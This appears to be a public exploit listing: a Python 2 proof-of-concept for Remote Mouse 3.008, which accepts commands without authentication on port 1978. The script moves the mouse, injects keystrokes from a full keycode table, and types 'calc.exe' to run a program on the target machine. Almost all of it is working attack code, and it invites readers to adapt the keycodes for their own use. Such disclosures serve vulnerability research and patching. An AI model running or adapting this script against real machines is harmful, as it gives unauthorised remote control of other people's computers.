扫码分享
验证:
体验盒子# Exploit Title: Remote Mouse 3.008 - Failure to Authenticate
# Date: 2019-09-04
# Exploit Author: 0rphon
# Software Link: https://www.remotemouse.net/
# Version: 3.008
# Tested on: Windows 10
#Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
#This script pops calc as proof of concept (albeit a bit slowly)
#It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv
def Ping(ip):
try:
target = socket(AF_INET, SOCK_STREAM)
target.settimeout(5)
target.connect((ip, 1978))
response=target.recv(1048)
target.close()
if response=="SIN 15win nop nop 300":
return True
else: return False
except:
print("ERROR: Request timed out")
def MoveMouse(x,y,ip):
def SendMouse(command,times,ip):
for x in range(times):
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(command,(ip,1978))
sleep(0.001)
if x>0:
command="mos5m 1 0"
SendMouse(command,x,ip)
elif x<0:
x=x*-1
command="mos5m -1 0"
SendMouse(command,x,ip)
if y>0:
command="mos5m 0 1"
SendMouse(command,y,ip)
elif y<0:
y=y*-1
command="mos6m 0 -1"
SendMouse(command,y,ip)
def MousePress(command,ip,action="click"):
if action=="down":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
elif action=="up":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" u"),(ip,1978))
elif action=="click":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
target.sendto((command+" u"),(ip,1978))
else: raise Exception('MousePress: No action named "'+str(action)+'"')
def SendString(string,ip):
for char in string:
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(characters[char],(ip,1978))
sleep(0.5)
class mouse:
leftClick="mos5R l"
rightClick="mos5R r"
middleClick="mos5R m"
characters={
"A":"key8[ras]116", "B":"key8[ras]119", "C":"key8[ras]118", "D":"key8[ras]113", "E":"key8[ras]112",
"F":"key8[ras]115", "G":"key8[ras]114", "H":"key8[ras]125", "I":"key8[ras]124", "J":"key8[ras]127",
"K":"key8[ras]126", "L":"key8[ras]121", "M":"key8[ras]120", "N":"key8[ras]123", "O":"key8[ras]122",
"P":"key8[ras]101", "Q":"key8[ras]100", "R":"key8[ras]103", "S":"key8[ras]102", "T":"key7[ras]97",
"U":"key7[ras]96", "V":"key7[ras]99", "W":"key7[ras]98", "X":"key8[ras]109", "Y":"key8[ras]108",
"Z":"key8[ras]111",
"a":"key7[ras]84", "b":"key7[ras]87", "c":"key7[ras]86", "d":"key7[ras]81", "e":"key7[ras]80",
"f":"key7[ras]83", "g":"key7[ras]82", "h":"key7[ras]93", "i":"key7[ras]92", "j":"key7[ras]95",
"k":"key7[ras]94", "l":"key7[ras]89", "m":"key7[ras]88", "n":"key7[ras]91", "o":"key7[ras]90",
"p":"key7[ras]69", "q":"key7[ras]68", "r":"key7[ras]71", "s":"key7[ras]70", "t":"key7[ras]65",
"u":"key7[ras]64", "v":"key7[ras]67", "w":"key7[ras]66", "x":"key7[ras]77", "y":"key7[ras]76",
"z":"key7[ras]79",
"1":"key6[ras]4", "2":"key6[ras]7", "3":"key6[ras]6", "4":"key6[ras]1", "5":"key6[ras]0",
"6":"key6[ras]3", "7":"key6[ras]2", "8":"key7[ras]13", "9":"key7[ras]12", "0":"key6[ras]5",
"\n":"key3RTN", "\b":"key3BAS", " ":"key7[ras]21",
"+":"key7[ras]30", "=":"key6[ras]8", "/":"key7[ras]26", "_":"key8[ras]106", "<":"key6[ras]9",
">":"key7[ras]11", "[":"key8[ras]110", "]":"key8[ras]104", "!":"key7[ras]20", "@":"key8[ras]117",
"#":"key7[ras]22", "$":"key7[ras]17", "%":"key7[ras]16", "^":"key8[ras]107", "&":"key7[ras]19",
"*":"key7[ras]31", "(":"key7[ras]29", ")":"key7[ras]28", "-":"key7[ras]24", "'":"key7[ras]18",
'"':"key7[ras]23", ":":"key7[ras]15", ";":"key7[ras]14", "?":"key7[ras]10", "`":"key7[ras]85",
"~":"key7[ras]75", "\\":"key8[ras]105", "|":"key7[ras]73", "{":"key7[ras]78", "}":"key7[ras]72",
",":"key7[ras]25", ".":"key7[ras]27"
}
def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(1)
SendString("calc.exe",ip)
sleep(1)
SendString("\n",ip)
print("SUCCESS! Process calc.exe has run on target",ip)
def main():
try:
targetIP=argv[1]
except:
print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
exit()
if Ping(targetIP)==True:
PopCalc(targetIP)
else:
print("ERROR: Target machine is not running RemoteMouse")
exit()
if __name__=="__main__":
main()
体验盒子
